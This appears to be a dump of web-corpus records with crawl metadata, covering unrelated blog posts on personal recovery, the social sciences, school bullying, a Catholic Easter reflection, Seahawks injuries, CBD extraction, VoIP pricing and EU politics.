We have discussed the issue and replied by mail. Thanks!
| common_corpus | {'identifier': 'https://stackoverflow.com/questions/66981426', 'collection': 'StackExchange', 'open_type': 'Open Web', 'license': 'CC-By-SA', 'date': '2021.0', 'title': 'Stack Exchange', 'creator': 'ginger jiang, https://stackoverflow.com/users/13326504, https://stackoverflow.com/users/885666, prashant patel', 'language': 'English', 'language_type': 'Spoken', 'word_count': '319', 'token_count': '510', '__index_level_0__': '42730', 'original_id': 'ed081c693b15b3c0fb6e6f66d3218d41752903b9ffb21faa49547882c6adbabe'} |
Being Vunerable : Nancy's Blog
Alternatives In Recovery
Nancy DePaola Coaching
The rays of happiness, like those of light, are colorless when unbroken"
Harry W. Longfellow
Trauma, Grief
and Family Addiction Coach
(804) 690-6332
Being Vunerable
by Nancy D. on 09/09/18
I've been undergoing my own struggles with releasing this site. Putting my thoughts and feelings into a blog and releasing them out to the world is quite frightening. I've been working with a small group of two other women who took the same certification course I just took for Trauma, and we have all been struggling with a failure to launch.
Each one of us has gifts and talents that we highly respect in the other. Probably all of us are thinking about the other, "wow, she has this more than I, she should be putting herself out there., they both have a great niche, but what about mine?". People would really benefit from her knowledge in this area". Yet, we fail to do that, because of some internal fear of our own vuneralability.
Perhaps it's the failure to show up in our own lives, somehow. We are all used to showing up in everyone else's life around us, doing for them, making sure they have everything they need to successfully get through the day. Yet, probably none of us receive that same help. Sure, our partners all go out to work their respective jobs, but no one is making sure my bed is made, or my laundry is done, or whether I've taken my cold medicine, or whether the house is clean or gauging whether I'm upset or have had a bad day. I do that for everyone else, but am struggling to launch a website for myself. How crazy is that?
Perhaps, it's because we think the only people who believe in us are ourselves? We've been so conditioned to look after everyone else's needs, requiring no assistance with our own, that it has brainwashed our core values to believe the lies: We aren't worthy? We shouldn't have any needs? We shouldn't ask for help? These businesses are for us. My website is for me, my business is for me, my passion for what I want to do in life is for me. Why is that so frightening? Why do I feel so intimidated by the outside world that I cannot open up and share with them what thoughts I have in my mind. The ideas and lessons that I have learned? Why can't I open up and expose myself? What is stopping me?
The people I respect the most in the world are the vunerable ones. The ones that aren't afraid to put their real selves out there. I am real with my friends I talk too, with people I meet. Perhaps, this is a side of myself that has been on such a personal journey for so long, that it's hard to go out there and make it public.
I'm desperitely trying to find the answer so I can push forward and "be".
I think, it's the fear I'll make a mistake. I'm terrified of social media and not knowing how everything functions on blogs, websites, twitter and facebook..It's all so overwhelming. I need someone to explain all of this to me so I can have a clear understanding of how it works in my mind, so I'll know what I am exposing and to who. I need to feel safe. That's it. I need to feel safe and in control of the things I do, the information that I put out there, and the anonimity that I want for myself and for others. I need to feel safe.
Well, I guess I found the answer to my problem. I guess I'll be launching that website now, finally... :)
Comments (0)
Leave a comment
Nancy's Blog
Contact Us | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '2', 'language_id_whole_page_fasttext': "{'en': 0.963176727294922}", 'metadata': "{'Content-Length': '37662', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:4WE5RLJVO2RO4COBUXOHVZVMZUSEWIOL', 'WARC-Concurrent-To': '<urn:uuid:99d5940e-3cb0-4f90-9255-c684d06504b6>', 'WARC-Date': datetime.datetime(2019, 12, 8, 23, 6, 24), 'WARC-IP-Address': '108.167.135.71', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:QSID3TV3ZAIFKC3OIM6LFOBRO7SEQ2PK', 'WARC-Record-ID': '<urn:uuid:1332ffdb-d9da-418e-906b-9408f4436943>', 'WARC-Target-URI': 'http://www.alternativesinrecovery.com/Blog.html?entry=being-vunerable', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:f035e65f-c26b-4d23-95a5-45df4eb920e4>', 'WARC-Truncated': None}", 'previous_word_count': '636', 'url': 'http://www.alternativesinrecovery.com/Blog.html?entry=being-vunerable', 'warcinfo': 'isPartOf: CC-MAIN-2019-51\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for December 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-73.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.05626779794692993', 'original_id': '83066a6bdbc5a246657e914398680ef2f6c01fce2092fb7d0bcec519188487e7'} |
Pages
21 July 2013
Let’s Shake Up The Arrogance: A Reply to Nicholas A. Christakis
Writing in the “New York Times” Nicholas A. Christakis
posits that the social sciences have stagnated. Using as his point of reference
the decline and disappearance of departments of anatomy, histology,
biochemistry and physiology, Christakis claims that “taking a page from Darwin,
the natural sciences are evolving with the times”. And the outcome has been
whole new fields, discoveries, majors, and everything that Christakis takes to
be self-evidently good and right and novel.
What’s needed, Christakis suggests, is for a small rear
guard to close once and for all discussions of the old-fashioned topics such as
“monopoly power, racial profiling, and health inequality” and move the social
sciences on. Vanguard social scientists, he says, should get into the serious
business of talking about social neuroscience, evolutionary psychology, and
behavioural economics. And, ultimately, we should all spend our time being
moral entrepreneurs for biology:-
It is time to create
new social science departments that reflect the breadth and complexity of the
problems we face as well as the novelty of 21st-century science. These would
include departments of biosocial science, network science, neuroeconomics,
behavioral genetics and computational social science. Eventually, these
departments would themselves be dismantled or transmuted as science continues
to advance.
Why do social scientists supposedly need to do these things?
Because the institutions of social science need to match today’s intellectual
challenges, which according to Christakis, they don’t now.
The arrogance of this argument is simply breathtaking.
Consider the entrance supposition. Christakis claims that the disappearance of
anatomy, histology, biochemistry, and physiology represents the natural
evolution of science and that this pattern is one social science should
emulate. There is a rule, and a quite good one, in the sociology of
professions; namely, beware metaphors of growth.Christakis is either woefully ignorant of the
literature in his own field or he is cynically deploying the very linguistic
technologies generations of sociologists decoded as they studied the emergence
of professions, disciplines, and specialties. Simply put, there was no natural extinction
of those sciences from the academy. The evolutionary metaphor might offer a
tidy narrative about the natural order to the dissolution of those fields, but
what factually happened, as any even modestly-well read historian or
sociologist should know, is that government funding for certain types of
natural sciences activity dried-up. Far from an evolution, this was an
intentioned extinction. Universities, having often become dependent upon
government largess, changed administratively and re-organized themselves to
continue to chase funding. Physiology, for example, did not naturally become
neuroscience. Physiologists rightly detected that their research funding would
continue if they began identifying themselves as neurobiologists.That wasn’t evolution. And it wasn’t progress
either. It was measuring the exact same problems with institutionally different
sticks to get differently ear-marked sources of funding.
But ignore this point, and consider the arrogance of
suggesting that it was a good thing that departments of anatomy, histology,
biochemistry, and physiology went the way of the dodo. The conceit of this
claim comes from two quite separate directions. It firstly and implausibly suggests that students are able to learn everything they need to know in other
places about those now deceased fields to be conversant sufficiently to
understand the now more highly evolved scientific species that have replaced
them. Here the evolutionary narrative falls apart completely – the transformation
of species creates new species. But the sciences of physiology, biochemistry,
etc. etc. remain as significant now as they did in the past. The difference is
that we have a whole generation of students now who are going to have to go
about relearning the things their arrogant administrators and professors denied
them because of institutional exigencies.
Christakis secondly
implies that he believes in the evolutionary progress of science. Yet
that very progress should be cumulative and so the disappearance of fields because
of funding exigencies and politics should be regretted by any thoughtful
person. His version of progress is rather like removing math departments
because we have calculators. That Christakis doesn’t see the irony of his
position; that he seems unconcerned by the diminished autonomy of universities
and researchers; and that he seemingly lauds by insisting on the validity of
what Philip Mirowski calls the progress of science-mart, suggests that
Christakis doesn’t much value even the autonomy of the natural sciences. Small
wonder, then, that he should be so dismissive of the social sciences.
Christakis’ polemic hardly stops with his poor
caricature of how things have happened in the natural sciences – after all he
says that social scientists should refashion themselves into the image of the
natural scientists. Why should they do this? Because everyone agrees with the
old, tired refrains of sociology. So it is time to move and join the flavour of
the month club in neoliberal science.
But excuse me – wait a second! Isn’t
Christakis admitting that the social sciences have actually discovered a few
things that ‘everyone now agrees with’? And, if so, then doesn’t that imply
that since some of these things are true, the challenge of the times for social
scientists is to help people see that many of our intellectual challenges today
remain the same as they did a century ago? If everyone agrees that monopoly
capitalism, racial prejudice, and health inequality are bad, then why haven’t
those challenges been fixed?
Christakis seems to think that the fact that
everyone agrees about these problems is a sufficient condition for considering
them solved. Would that this utopian fantasy were true! Indeed, I’d suggest
that the persistence of these social conditions actually suggests that some of
those very smart natural scientists that Christakis lauds so much should quit
their jobs in cloistered laboratories and begin to help social scientists address
the problems upon which now apparently everyone agrees. Of course the point
that Christakis elides is that any number of people don’t agree with the social
scientists on any of these issues. In this sense, Christakis has proffered a
fantastically, irresponsible argument.
Christakis wonders why social science students are not asked
to engage in laboratory research. I wonder why scientists are not required to read more social science. Christakis suggests that students could be
encouraged to conduct randomized experiments on internet populations. Leaving
to one side the ethical implications of that suggestion, consider instead that Christakis is implying that the laboratory is the only place where true knowledge
is made. I wonder what Darwin was up to then when he was trekking around South
America? And why specifically would something involving ‘modelling’ – which is
apparently what Christakis means for undergraduates to be doing – require a
‘laboratory’. Why wouldn’t a really powerful computer in a dorm room with
access to demographic databases be sufficient to create knowledge? And whither
ethnography or anthropology or oral history? Christakis also seems to deny that some knowledge could be
gained through a visit to the university library. And, that, by the way, might
also be true for the natural scientists too. I’d argue that we would produce
better scientists and students if they had a deeper grasp of the scholarly
literature in many fields. Evolutionary psychologists, for instance, should
read at a minimum Emil Durkheim and Max Weber (hardly esoteric figures of the
Western scholarly canon). But as is so often the case, authors who write with
the pompous urgency that Christakis adopts seldom seem to see scholarship in a reciprocal
light - it is the social scientists who are supposed to read-up on the science
literature and not the other way around. Perhaps we should take it as axiomatic
that before any natural scientist should tell us how to do social science, they
should evidence some actual knowledge about what social scientists have been
doing and saying for the last century. Indeed, I think it is fair to say that
social scientists are far more conversant with trends and discoveries in the
natural sciences, than the other way around. The irony, of course, is that many of the things social
scientists have explored and do know quite a bit about – problems of trust, the
status of objectivity, economics, the multiplicity of narrative, patronage, regulation,
class, racism, monopoly power – are exactly the types of knowledge that are
bound to present something of a criticism of the new fields Christakis sees as
emergent and ascendant. It is true that social scientists find themselves often
bewildered by the questions being asked in those fields which Christakis
suggests will shake them up. But they are not bewildered by the statistics,
methodolotry, metricidolotry, models, or jargon. They are bewildered by the
banality, the poor historical knowledge, and the single-minded, blinkered
ignorance of the social science canon. Many in Christakis' vanguard sciences
postulate that they are in the business of doing something new. They expect us
to believe it and bow to their claim. Christakis’s lauding of physical
anthropology (i.e. human evolutionary biology) is a case in point. It sounds
neat, vanguard, and even that bit edgy given its evolutionary underpinnings.
Too bad that it is a project that has been around – oh, since, Darwin, Huxley,
Crichton-Browne, and others. And genetics doesn’t make it new and shiny
either. It just used to be called eugenics.
The social sciences do not need defending. Their value and
contribution to civil society, political economy, industrial management,
accounting, archaeology, environmental engineering, civil engineering, urban
development, polling and surveying, agricultural management, actuarial practice, demography, economics, and, yes,
biological science is so self-evident and historically obvious that it is only
possible to ignore this fact by living in a closed world where shouting in a cave compels and convinces the person shouting that the rebounding sound is truth.
Anyone who is paying attention at all knows that the natural
sciences, engineering, the social sciences, the humanities, and the university writ large have been having a bad time
as of late. Among the great sins that have created
the endemic risks to the university have been the perpetual and schizophrenic attempts to make science faddish. Neuroscience has of late fallen
dramatic victim to this tendency, but it was hardly the first science to do.
These trends have been on-going since the 1970s. In many instances, they have
damaged public understanding of science. They have promoted cultures of
anti-science, so much so that anti-vaccination beliefs – for instance – have
become rampant. Christakis proposes, however, to ignore all of this; he
proposes to refashion the social sciences into this corrupt image of the natural sciences.
Too bad for the natural sciences, for natural scientists might stand to gain a
great deal more by standing with their social science colleagues who declare
this the fool’s errand it is.
There is a final irony worthy of drawing out. It pertains to
the indelicate timing of Christakis’s essay, which appeared just as news of
Detroit’s bankruptcy began circulating in newspapers. What explanations could
neuroeconomics, human evolutionary biology, network science, biosocial science
and computation social science give us for the disaster that has become
third-world Michigan? What could those fields tell us of the human costs there?
Obviously Christakis implies that much of the social science that might
usefully analyze those events has been settled, but it is strikingly difficult
to think of any macro-level contribution that could come from these would be usurpers
of social science that would not in the first instance be derivative of Christakis’ putative, old-fashioned,
obsolete social science. And, curiously, were the social sciences to undergo
the demise that Christakis’ desires, there would be very few left in
universities who would have anything to say at all about these macro-level
cataclysms that have destroyed thousands of peoples' lives. What would be left
would be an unkind nihilism. | mini_pile | {'original_id': 'efd406cb0c100c47dee8c2d11645d754c625991ff9fd58f83bf44f33a22d3f4f'} |
Sunday, 6 October 2013
“Why don’t you clear up the spots on your face before you start looking at me like that?” His tone cut through me, a sharp knife being sliced across my veins. I tore my eyes away, cursing myself for staring and, what’s worse, for being caught. The snickers exploded from behind him as he turned to high five his posse in satisfaction. A new day, a new insult, as per usual. I hid the invisible wound, letting it rest in the back of my mind as I ran on forwards, fixing my backpack as it slipped from my shoulder.
I hurried into class, eyes fixated on the floor while I shuffled around to find my seat.
“Oh, what do we have here? Late again are we Kimberly? Now how many times is that already this week?”
“That’s three.” I said, hanging my head in shame.
“Only three? Well, you’re doing better than last week.” The class exploded into giggles as the teacher continued to mortify me, my cheeks burning like the flame of her ginger hair. I could feel the tears coming. Not now, I told myself, save it for later.
The cafeteria stirred as my ears caught random pieces of different conversations, the chatter endless. I held the tray tight while my eyes drifted from table to table, looking desperately for an empty space. Finding one, I sat down, stealing a glance at the group of girls next to me. The popular crowd, brilliant. I tried to concentrate on the food, but I couldn’t ignore the giggles as I saw them pointing their perfectly painted finger nails at me. I caught the words “hair” “ugly” and “gross” and stood up to leave, heart pounding as it broke into thousands of pieces. As I rose, my shoelace caught on the leg of the chair. It fell backwards as I hit the floor, the crash deafening. The chatter died down as everyone turned to see what had happened, making no effort to control their laughter. The tears very nearly came, but I swallowed them back. Later.
Frustration bled through me as I punched the floor, tears staining my face. The insults tore me up inside, so agonising, so painful. It happened every single day, I had learnt to deal with it, learnt to hide the hurt of the comments. I kept them locked up inside until I was alone, on my bathroom floor, emotions shattered. Why couldn’t I be pretty, or have perfect skin like the others girls? Why did teachers hate me? Why did I have to live in dread every single day, just waiting for the next load of abuse? I hid the bruises, covered up the scratches, sealed the internal wounds and kept going. Until I was alone that is, with nothing else but my thoughts drumming into my mind. I would wind up insane, tears spilling down my cheeks, pain exploding from within my heart. Why couldn’t I just be somebody else?
Bullying doesn't have to last forever. You can make it stop. Call this number to talk to somebody today. (1800 55 1800)
Or visit these websites: | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.972774863243103}", 'metadata': "{'Content-Length': '57194', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:4FX2ZK5HYLAUAUQYKKT6SJY66WGA273W', 'WARC-Concurrent-To': '<urn:uuid:9b025afe-ea8d-4b27-9458-acd158465c57>', 'WARC-Date': datetime.datetime(2017, 8, 21, 8, 26, 46), 'WARC-IP-Address': '172.217.7.225', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:GFJ6V5L6TZOTBK4E7EJZSOJT4GJJORFI', 'WARC-Record-ID': '<urn:uuid:f0150071-acf3-474a-9352-15c8dcbb3369>', 'WARC-Target-URI': 'http://alicekouzmenkowriting.blogspot.co.uk/2013/10/strength.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:a587099d-2600-4c0e-85e1-3dc54300ac41>', 'WARC-Truncated': None}", 'previous_word_count': '518', 'url': 'http://alicekouzmenkowriting.blogspot.co.uk/2013/10/strength.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-166-12-144.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-34\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for August 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.1386011838912964', 'original_id': '2efcfcdef544b9bfd5758c9d07a23cecd6873b8137cb710904ae017a91fe1218'} |
Search This Blog
Monday, April 22, 2013
Mystagogy for Dummies (like me) - Easter 4
“My sheep hear my voice;I know them, and they follow me." (Jn 10:27)
Following up, again, on my question for the season. After listening to the gospel and the rest of the readings, psalm, and homily on Sunday, I'm trying to reflect briefly on this question -
What does it mean "to rise from the dead"?
In the reading from Acts yesterday, we heard a bit about one of the journeys of Paul and Barnabas. They have been preaching in the towns to the Jews and their Gentile sympathizers, called here "worshippers" but elsewhere "God-fearers." Their preaching hits a snag when the local Jewish establishment fights back. The preaching to the "Gentiles" (the word is derived from the Latin word for "nations," gentes, translating the Hebrew goyyim and the Greek ethne) falls happily upon the ears of the non-Jewish "God-fearers," who support the Jewish community but are unwilling to be assimilated through cultic initiation and circumcision. Paul and the diaspora Jews were wooing the same clients, and though Paul had made inroads, in this case at least, people of influence stirred up "a persecution" against Paul and Barnabas, and they moved on.
In the second reading that continues Revelation, those who suffered the Great Tribulation, probably a reference to martyrs of the Roman persecutions under emperors from Nero to Trajan or Hadrian, are seen gleaming in the New Jerusalem, where they will never suffer again. The "Lamb will shepherd them," leading them to streams of life-giving water, wiping away every tear.
The brief gospel offers a couple of images of the Good Shepherd, the one quoted above, and the promise of eternal life. Further, the gospel speaks of the intimacy between Jesus and the Father, invoked on behalf of the "sheep," reinforcing their safety in the care of the Good Shepherd. The sheep belong to the Father. No one has the power or strength to remove them.
So, what does it mean to rise from the dead?
I ask myself, first, what does it mean to be dead? In these readings, it's clear from the second reading that there's a literal, foundational meaning. There is a meaninglessness to loss of life, especially when the good die at the hands of brutal and "godless" persons; or, let's say, people who worship different gods. This is not a dead issue in the twenty-first century. There is plenty of religious slaughter in the world today, though it seems to me a lot of it is political slaughter or ideological slaughter that wraps itself in religious language. It doesn't matter. Innocent people die. Murderers and ideologues live. With the death of innocents, something of us dies too, something that wants to believe in the triumph of good, that good is stronger than evil all the time, that God protects good people from harm. Violence, the self-perpetuating force that both "civilizes" the world (for the strong) and destabilizes it (from the disenfranchised side) in a cycle of blood and terror, is ongoing death. To rise from the dead, we need to stop that cycle.
To be unable to change is to be dead. As early as the ancient Greeks (Heraclitus), life has been associated with change. No less a light than Cardinal Newman observed that "to live is to change, to be perfect is to have changed often." I'm not sure whether his eminence would have applied this to divine life, which has been tenaciously defended as "unchanging," but I like the idea that for created life, anyway, life is change, because it fits with the data. I think that when we tend to settle into all kinds of patterns of unchanging behavior, and when it begins to affect our interactions with others negatively, so that we resist change, we start to die in a way. This is spinning through folks in the second reading. I don't blame them, I'm the same way. It's still a mortal issue.
How can I tell when to change, and when to hold fast? I think that Christ who is life, who is perfect life, whether in perfect stasis or fluidity, wants us to know. "My sheep hear my voice," says the Lord. In the chaos and rancor of life, when we listen for the voice that says "Do not be afraid, put away your sword, love one another, love your neighbor, especially your enemy, as yourself," we hear the voice of the shepherd. There are a lot of other voices out there, but none of them is the same. The voice of the shepherd leads out of violence and non-life to "peaceful streams of life-giving water." And generally speaking, the voice is not coming from "beyond," but from right beside us somehow. We discern it together. All of us, together, know the voice of the shepherd.
Being sixty isn't an excuse for stasis, but it's not a free-for-all, either. My place, it seems to me, is to listen for the voice of the shepherd, and listen from inside my community, for the give-and-take of discernment to lead us out of the mundane and mortal quest for revenge and participation in the culture of violence, and to move together toward peace for everyone. And as a leader in the community of sorts, I also need to echo and channel the shepherd's exhortation to peace and tranquility. I need to be willing to go outside the sheepfold and bring back the lost, if I am called to do that, and defend the weak and vulnerable with my wits and strength.
The Shepherd and the Lamb matter. The Shepherd and the Father are one. And by the grace of God, we are made one with the Lamb by the bath and the meal of the Spirit. It was life that changed Paul, life that inspired and gave courage to the multitude who shed their blood and who were washed clean in the Lamb's blood. I want that life, the life that says "Do not be afraid, put away your sword, love one another, love your neighbor, especially your enemy, as yourself." It looks to me as though the life that speaks those words is what it means to rise from the dead. The voice that speaks those words is the voice of the shepherd.
You have spread your banquet before me
In the unbroken sight of my foes
While my head is anointed with kindness
And the cup of my life overflows.
God alone may lead my spirit
Far away from want and fear.
For the Lord is my true shepherd
And I know the Lord is near.
(Tom Conry, "Psalm 23," © 1994 Team Publications, published by OCP) | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '23', 'language_id_whole_page_fasttext': "{'en': 0.9670709371566772}", 'metadata': "{'Content-Length': '89446', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:JX3G6C2KFOMSL5PRDFBGNLD6RGYKD5WR', 'WARC-Concurrent-To': '<urn:uuid:8394ae34-643d-4ec5-9421-610e967d7665>', 'WARC-Date': datetime.datetime(2017, 2, 22, 21, 59, 20), 'WARC-IP-Address': '216.58.216.65', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:BPG7WYTQRGQD6S7YQ6UOHF64CMVBR2EN', 'WARC-Record-ID': '<urn:uuid:72cdc11a-0905-4120-8356-e5e0e9549bb6>', 'WARC-Target-URI': 'http://rorycooney.blogspot.com/2013/04/mystagogy-for-dummies-like-me-easter-4.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:a0f0eb1a-504b-4944-8893-111590086c0e>', 'WARC-Truncated': None}", 'previous_word_count': '1088', 'url': 'http://rorycooney.blogspot.com/2013/04/mystagogy-for-dummies-like-me-easter-4.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-171-10-108.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2017-09\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for February 2017\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.036944031715393066', 'original_id': '52d5a03973148981fda1f575f312f2e27e3ca86cc931334b571d0d669a548c58'} |
Hawks get roster to 75: Harvin among those put on Reserve/Physically Unable to Perform list
Summary of 3 articles · Updated Aug 27, 2013
As expected, the Seahawks have decided to leave receiver Percy Harvin on the Physically Unable to Perform list following surprise surgery to repair a torn labrum in his hip. Players on the reserve PUP list can return to the active roster in Week 6 of the … (more)regular season, however, this doesn't mean the Seahawks expect Harvin back sooner than late November from his hip surgery. After Week Six, the Seahawks have five weeks to activate Harvin for practice purposes. Seattle also placed linebacker Korey Toomer on the reserve/non-football injury list. Starting defensive tackle Brandon Mebane , who suffered a groin injury in Monday’s practice, did not work out with the team Tuesday.
Harvin goes to regular-season PUP list
As expected, the Seahawks have decided to leave receiver Percy Harvin on the Physically Unable to Perform list following surprise surgery to repair a torn labrum in his hip. The move means that Harvin, a high-profile offseason trade acquisition from the… | mini_pile | {'original_id': '0325361596cafb56da49d3425730f16d42fbfefe0838c5614aa35a3215ad5512'} |
How is CBD made?
While there are several ways to extract CBD, one eco-friendly method that consistently produces top-quality cannabidiol stands out from the rest.
Above is an image of the final product of CBD extracted using oil.
According to Project CBD a California-based non-profit devoted to CBD research, CBD can be extracted through three methods: CO2 extraction, ethanol, and olive oil.
Project CBD expands on the CO2 extraction process, noting “the supercritical (or subcritical) CO2 method uses carbon dioxide under high pressure and extremely low temperatures to isolate, preserve, and maintain the purity of the medicinal oil.”
Technical experts at the Hemp Gazette speak highly of the increasingly popular CO2 extraction method, citing “carbon dioxide-based extraction is considered to be more environmentally friendly, considerably safer, cleaner, cheaper and less toxic than using fossil fuel-based extractions-- and results in a consistent product that is more palatable.” For these reasons and more, many project CO2 extraction to be the future of large-scale commercialized CBD production.
All of the merchandise at PHD Organics is produced using the CO2 extraction method, resulting in high-quality and environmentally friendly products. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '34', 'language_id_whole_page_fasttext': "{'en': 0.8997414708137512}", 'metadata': "{'Content-Length': '39074', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:36QQN6LI4MT4TZPZGVMUQNOV66RJWPE7', 'WARC-Concurrent-To': '<urn:uuid:8cf9674b-91e6-48f1-b603-c4e849231488>', 'WARC-Date': datetime.datetime(2021, 6, 22, 17, 52, 57), 'WARC-IP-Address': '35.227.243.103', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:OSCZYY3O25M4QGCR5EGZ4K4SXDEYSYSK', 'WARC-Record-ID': '<urn:uuid:83a31844-8e5f-4e41-a28c-ac52ba06ce30>', 'WARC-Target-URI': 'https://phd-organics.com/how-is-cbd-made/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:e9a7c1b0-dfd3-4137-869e-547014ee727c>', 'WARC-Truncated': None}", 'previous_word_count': '182', 'url': 'https://phd-organics.com/how-is-cbd-made/', 'warcinfo': 'isPartOf: CC-MAIN-2021-25\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for June 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-52.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.43921589851379395', 'original_id': 'e850bd3fad5124993799f562284feefdab8b032cbe664c34534d42d9c01970c3'} |
Thursday, December 04, 2008
VoIP Pricing on Sale
In the midst of this economy event, 8x8 sent out a press release to bloggers about their new pricing. It's a sale. Why send it out as PR? Because people will write about it. But if people mention how your news is no news and you are trying to trick the press, how do you think consumers will feel about your company? Will they think you are Creative? That you put one over? Or that you are likely to be too devious to be their vendor? Um... the last one most likely. BTW, the "sale price" is not really a sale either.
No comments: | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9736891388893129}", 'metadata': "{'Content-Length': '66182', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:ZRFIJ67KVQEEP46ZHB3QJMK4NVQIENBN', 'WARC-Concurrent-To': '<urn:uuid:1001dda9-994d-4f71-8856-e6732661ba25>', 'WARC-Date': datetime.datetime(2019, 3, 22, 11, 10, 7), 'WARC-IP-Address': '172.217.7.147', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:W37N5VYUH2YWPJGMWNKUCNMU46OLCI5K', 'WARC-Record-ID': '<urn:uuid:4235a3e9-0bae-4fde-b99b-4cf59167746f>', 'WARC-Target-URI': 'http://www.onradsradar.com/2008/12/voip-pricing-on-sale.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:66bd9285-cb45-436d-bada-9442bbfb713b>', 'WARC-Truncated': None}", 'previous_word_count': '111', 'url': 'http://www.onradsradar.com/2008/12/voip-pricing-on-sale.html', 'warcinfo': 'isPartOf: CC-MAIN-2019-13\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-69-221-252.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.19433456659317017', 'original_id': '5b72bfb9e2af7c26ba29818bb118b1c50c1cd2666852c3869ebed70f12e3114a'} |
Friday, February 01, 2008
Daniel Hannan on Today
Much has been said about Daniel Hannan's spat with EPP and EU Parliament, with Devil's Kitchen being amongst the cheer leaders, so I don't intend to comment further on the case itself. My ire is aimed at those imbeciles on the Today program when they interviewed him.
What little democracy there was in the EU Parliament is being stripped away on the whim of one person because they don't like being asked to justify their votes. Furthermore, the EU Constitution Lisbon Treaty is being rammed through against the wishes of the vast majority of the electorate n this country as as well as many others. I could go on but I am sure you are aware of it all. So, what do the beeb concentrate on in the interview? Hannan's reference to the way Hitler came to power by removing parliamentary rights and insisting he has offended people.
Well I hope he has because we need people to be offended so they might then look at what is really happening to our democracy and rights.
All that is necessary for evil to succeed is that good men do nothing. (Edmund Burke, although the exact words are disputed)
Anyone would think the beeb was funded by the EU the way they ignore breaches of EU Den=democracy and defend it at every step. Oh, hang on they are.
